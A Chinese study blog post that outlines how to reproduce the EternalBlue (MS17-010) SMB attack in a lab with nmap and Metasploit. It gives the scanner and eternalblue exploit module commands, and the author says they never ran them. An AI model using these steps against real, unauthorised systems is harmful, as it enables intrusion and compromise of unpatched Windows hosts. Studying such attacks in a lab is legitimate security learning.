目录
- 追溯了解
- 网络IP查找
- 环境条件
- 复现流程
- 445端口
- 使用MSF的永恒之蓝漏洞模块
- 扫描模块
- 攻击模块
温馨提醒:纯水文,如果不幸翻到这篇文章,可以立刻关闭!
先整理两个学习的链接(本文学习第一个):
https://blog.csdn.net/weixin_44268918/article/details/125216308
https://blog.csdn.net/weixin_46145442/article/details/107419426utm_medium=distribute.pc_relevant.none-task-blog-2defaultbaidujs_baidulandingword~default-0-107419426-blog125216308.pc_relevant_multi_platform_whitelistv1&spm=1001.2101.3001.4242.1&utm_relevant_index=3
追溯了解
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
基于Windows网络共享协议进行攻击传播的蠕虫恶意代码
网络IP查找
ipconfig/all或者ipconfig
环境条件
两台主机能够互通通信,且靶机未打补丁以及开启445端口,关闭防火墙。虚拟机网络连接为桥接模式;
复现流程
没找到合适的主机,只能了解一下流程!
445端口
- 通过攻击机Kail的nmap进行端口扫描,通过扫描能够发现靶机的,445端口是否开启。命令为:nmap+靶场IP
使用MSF的永恒之蓝漏洞模块
1.打开MSF,命令为:msfconsole
2.搜索 ms17-010 代码(查找对应攻击模块),命令为:search ms17_010
0 exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
3 auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块。
一般先通过扫描模块对目标主机进行扫描判断是否存在漏洞,若存在漏洞再通过攻击模块进行攻击。
扫描模块
1.使用扫描模块对靶机进行扫描:命令为:use auxiliary/scanner/smb/smb_ms17_010
2.查看配置参数:命令为:set rhosts 192.168.20.10
3.执行扫描:命令为:run
通过扫描能够发现靶机可能会受到MS17-010的攻击。
攻击模块
1.使用攻击模块对靶机进行攻击:
命令为:use exploit/windows/smb/ms17_010_eternalblue
2.可以查看攻击模块能够攻击那些操作系统:
命令为:show targets
3.设置靶机或者目标IP:
命令为:set rhosts +靶场IP
执行攻击:命令为:exploit 或 run
